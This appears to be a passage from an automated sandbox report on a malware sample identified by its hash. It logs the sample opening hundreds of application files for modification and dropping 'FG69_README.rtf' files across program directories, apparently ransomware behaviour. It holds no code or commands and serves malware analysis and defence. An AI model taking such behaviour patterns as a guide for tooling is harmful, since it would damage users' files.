Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome.dll.sig d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Irkutsk d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Palau d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker_1.1.200.v20131119-0908.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-12 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\extensions\VLSub.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\CST6CDT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setEmbeddedCP.bat d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Danmarkshavn d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\security\javafx.policy d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\klist.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet_3.0.0.v201112011016.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-options.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.registry_1.1.300.v20130402-1529.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-modules-appui.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Honolulu d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Eucla d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.change_2.10.0.v20140901-1043.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Paris d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Nauru d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Belgrade d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Uzhgorod d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ms.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Dublin d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-windows.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedback.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\wsgen.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Montevideo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\acro20.lng d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\3RDPARTY d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Blanc-Sablon d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yakutat d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+4 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\javaw.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Canary d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-nodes_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\oracle.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkServerCP d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbynet.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Enderbury d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Pacific\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-visual.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director_2.3.100.v20140224-1921.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher_1.1.0.v20131211-1531.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vienna d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\UseFormat.bat d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Marquesas d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\NEWS.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Omsk d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Faroe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\removed-files d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\pt-PT.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Thule d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\manifest.json d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Rarotonga d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jabswitch.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Lisbon d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Chatham d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Manila d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Belize d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Extensions\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Jujuy d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kuala_Lumpur d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Ndjamena d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nassau d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.event_1.3.100.v20140115-1647.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\EST5 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\RegisterUndo.potm d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Petersburg d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Port_Moresby d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\LogoBeta.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\AssertConvertFrom.emf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands_3.6.100.v20140528-1422.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mahe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Mazatlan d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\Documentation.url d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstack.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvSOFT.x3d d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Stockholm d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Antigua d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Khartoum d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench_3.106.1.v20140827-1737.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+10 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-snaptracer.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Magadan d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Glace_Bay d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guatemala d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ml.pak 